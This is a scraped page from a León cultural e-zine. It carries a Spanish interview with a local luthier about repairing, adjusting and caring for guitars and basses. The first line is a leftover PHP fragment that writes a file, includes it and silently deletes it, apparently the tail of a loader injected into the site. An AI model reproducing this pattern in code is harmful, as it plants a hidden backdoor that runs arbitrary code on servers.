");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> el Rin.com, E-zine Inquieto y Agenda Cultural de León
Logo elrin.com
uvedoble-uvedoble-uvedoble-punto-elrin-punto-com elRin
Los datos de elRin.COM 1840 noticias publicadas
1690 Rineros registrados
0 Rineros conectados
2 anonimos conectados
652 mensajes en el foro
14069 mensajes en el foro antiguo
Frase Rinera: El talento no es garantia de ninguna otra virtud humana. [Robert Christgau] Envía la tuya
Deprecated: Function ereg_replace() is deprecated in /usr/home/elrin.com/web/noticias/index.php on line 66 Deprecated: Function split() is deprecated in /usr/home/elrin.com/web/noticias/index.php on line 67 Deprecated: Function ereg_replace() is deprecated in /usr/home/elrin.com/web/noticias/index.php on line 74 Deprecated: Function split() is deprecated in /usr/home/elrin.com/web/noticias/index.php on line 75 Deprecated: Function ereg_replace() is deprecated in /usr/home/elrin.com/web/noticias/index.php on line 82 Deprecated: Function split() is deprecated in /usr/home/elrin.com/web/noticias/index.php on line 83 Deprecated: Function ereg_replace() is deprecated in /usr/home/elrin.com/web/noticias/index.php on line 90 Deprecated: Function split() is deprecated in /usr/home/elrin.com/web/noticias/index.php on line 91
Noticias pasadas

Un Luthier en León.

paraleer

Foto1

- ¿Cómo comenzaste en esto de la luthería?

Comencé de forma autodidacta, primero con mis guitarras y luego con las de los amigos. Es complicado aprender de esta manera ya que tienes que investigar mucho y estudiar libros especializados, la mayoría editados fuera de España. Más tarde conocí a un constructor de violines que me introdujo en el mundo de la madera y construcción. También he realizado cursos de construcción de guitarras y tengo estudios relacionados con la electrónica que aplico al campo de los instrumentos eléctricos. En total desde que empecé a interesarme por este mundo llevo más de 10 años.

- ¿Haces instrumentos o sólo los ajustas y reparas?

Principalmente estoy reparando, restaurando y ajustando, aunque también tengo en proyecto algunas guitarras clásicas con las que quiero experimentar diferentes técnicas.

De momento en el tema de construcción no quiero aceptar ningun encargo hasta que no consiga acercarme al sonido que estoy buscando. De todos modos en la web iré informando de este tema para el que le interese.

- ¿Cuál fue la primera guitarra que fabricaste/reparaste?

Mi primera guitarra fue un trabajo para la Universidad de León cuando estudiaba Educación Musical. Fue una guitarra electroacústica que construí mediante un método que me inventé para hacerla en el tiempo que me pedían, y la verdad es que no sonaba nada mal. Y la primera que reparé fue mi primera guitarra, una española que me regalaron mis padres y con la que aprendí a tocar.

- ¿Crees que en León hay campo para ser luthier?

La verdad es que para ser luthier en León tienes que moverte mucho e incluso salir fuera a otras provincias. También es importante la versatilidad a la hora de enfrentarte a un instrumento, conocer tanto el mundo acústico como el eléctrico y dominar diferentes técnicas para poder dar solucciones a los músicos.

- ¿Tus clientes más de guitarras, bajos o instrumentos clásicos? ¿tu especialidad?

Los músicos que vienen al taller son más de guitarras tanto eléctricas, como clásicas o acústicas. Bajos casi por igual. En cuanto a la especialidad, yo trabajo al mismo nivel sin importar el instrumento. Yo lo abordo de esta manera y pienso que si no estuviera seguro del trabajo que voy a realizar, definitivamente

no estaría dedicándome a esto. Para mi un instrumento es muy importante y se merece todo el cuidado y la misma profesionalidad sea del tipo que sea.

Foto3

- ¿Puedes darnos algún consejo para cuidar nuestros instrumentos?

Podría estar un buen rato dando consejos. Si quieres que tu instrumento suene correctamente, sea cómodo y dure unos cuantos años hay que empezar a valorar y a apreciar lo que se tiene entre las manos. Los instrumentos musicales son instrumentos de precisión y requieren de un mantenimiento y cuidado especial: limpieza, revisiones periódicas, cambiar las cuerdas a menudo, no someterlos a cambios bruscos de humedad y temperatura, un buen estuche...

- ¿Se recomienda una visita al luthier cada cierto tiempo?

La frecuencia a la hora de visitar a un luthier depende mucho del uso que el músico haga de su instrumento. Si tocas muchas horas o eres profesional tienes que llevarlo con más frecuencia que si solo lo utilizas para tocar en casa. Como mínimo habría que hacer una revisión completa al año y luego los trabajos normales de cambio de cuerdas, ajustes de mástil, altura de cuerdas, quintado... más a menudo ya que estos valores varian mucho según los cambios climáticos o el uso que haya recibido. Por otro lado, si aparecen grietas, deformaciones u otras anomalias, tienes que llevar tu instrumento de inmediato si no quieres que el problema se agrave.

- Háblanos de tu taller.

Mi taller esta enfocado principalmente de cara a la reparación y ajuste. Me ha costado mucho esfuerzo conseguir toda la herramienta y materiales necesarios para trabajar con todas las garantias. Por ejemplo, tengo mesas de ajuste diseñadas para facilitar el trabajo y que los instrumentos no sufran ningún daño; o herramientas especiales para la colocación de trastes y otros trabajos que son especificas de esta profesión. También he seleccionado diversas maderas que utilizo en la construcción de instrumentos o en las restauraciones como abeto alemán, ébano, palosanto, cedro rojo...

El ensamble de instrumentos y el barniz natural como la goma laca a muñequilla lo realizo aquí, aunque la madera la corto y preparo en otro lugar.

- Para terminar, algo que quieras decir a todos los rineros.

Lo primero gracias a tí por la entrevista y a todos los que visitais ElRin, ánimo y a seguir disfrutando con la música.

Puedes contactar con Luis Ángel en su web: http://www.eltallerin.es/ o en el teléfono: 650 728 379

Noticias pasadas
Noticias Agenda
Opinodromo

Último mensaje

Opinodromo antiguo
Tablón de anuncios

Estamos en ello

Estamos trabajando en el nuevo tablón de anuncios. Todavia no está operativo.

Grupos de León
Noticias pasadas

Presentación del disco de elrin.com

Presentación del disco de elrin.com

21 de Enero de 2004